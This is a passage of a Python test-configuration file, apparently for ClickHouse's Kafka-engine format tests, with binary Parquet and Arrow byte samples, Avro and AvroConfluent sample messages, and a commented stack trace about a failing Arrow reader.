\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\
xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\
x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\
xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # ''
# # ],
# },
'AvroConfluent': {
'data_sample': [
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(cluster.schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
cluster.schema_registry_host,
cluster.schema_registry_port
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one Avro file per message
# because of the nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
}
# 'Arrow' : {
# # Not working at all: DB::Exception: Error while opening a table: Invalid: File is too small: 0, Stack trace (when copying this message, always include the lines below):
# # /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:107: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de010df in /usr/bin/clickhouse
# 'data_sample' : [
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x